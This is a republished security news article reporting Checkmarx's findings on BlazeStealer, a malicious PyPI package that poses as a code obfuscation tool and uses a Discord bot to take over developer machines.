BlazeStealer Python Malware Allows Complete Takeover of Developer Machines

  /     /     /  
Publicated : 23/11/2024   Category : security


BlazeStealer Python Malware Allows Complete Takeover of Developer Machines


Checkmarx researchers warn that BlazeStealer can exfiltrate information, steal passwords, disable PCs, and take over webcams.



Malicious Python packages masquerading as legitimate code obfuscation tools are targeting developers via the PyPI code repository.
Focusing on those interested in code obfuscation is a savvy choice that could offer up organizational crown jewels, according to researchers at Checkmarx, who dubbed the malware BlazeStealer.
They warned on Nov. 8 that BlazeStealer is particularly concerning because it can exfiltrate host data, steal passwords, launch keyloggers, encrypt files, and execute host commands. It becomes even more dangerous thanks to the astute choice of targets, according to Checkmarx threat researcher Yehuda Gelb.
Developers who engage in code obfuscation are likely working with
valuable and sensitive information
. As a result, hackers see them as valuable targets to pursue and therefore are likely to be the victims targeted in this attack, Gelb explains.
BlazeStealer is the latest in
a wave of compromised Python packages
attackers have released in 2023. In July, Wiz researchers warned of PyLoose, malware consisting of Python code that loads an XMRig miner into a computer’s memory using the memfd Linux fileless process. At the time, Wiz observed nearly 200 instances in which the attackers used it for cryptomining.
For its part, Checkmark has tracked various malicious Python-based packages, including its
September 2023 discovery of culturestreak
, which runs a concurrent loop to tie up system resources for unauthorized Dero cryptocurrency mining.
The BlazeStealer payload can extract a malicious script from an external source, giving attackers complete control over the victims computer. According to Gelb, the malicious BlazeStealer payload activates once it is installed on the compromised system.
For command and control, BlazeStealer runs a bot carried via the Discord messaging service using a unique identifier.
This bot, once activated, effectively provides the attacker full control of the targets system, allowing them to perform a myriad of harmful actions on the victims machine, Gelb warns. Besides gathering detailed host data, BlazeStealer can download files, deactivate Windows Defender and Task Manager, and lock a computer by overloading the CPU. It does the latter by running a batch script in the startup directory to shut down the computer, or forces a BSO error with a Python script.
BlazeStealer can also take control of a PCs webcam using a bot that stealthily downloads a .ZIP file from a remote server and installs the freeware application WebCamImageSave.exe.
This allows the bot to secretly capture a photo using the webcam. The resulting image is then sent back to the Discord channel without leaving any evidence of its presence after deleting the downloaded files, Gelb notes.

Last News

▸ DHS-funded SWAMP scans code for bugs. ◂
Discovered: 23/12/2024
Category: security

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
BlazeStealer Python Malware Allows Complete Takeover of Developer Machines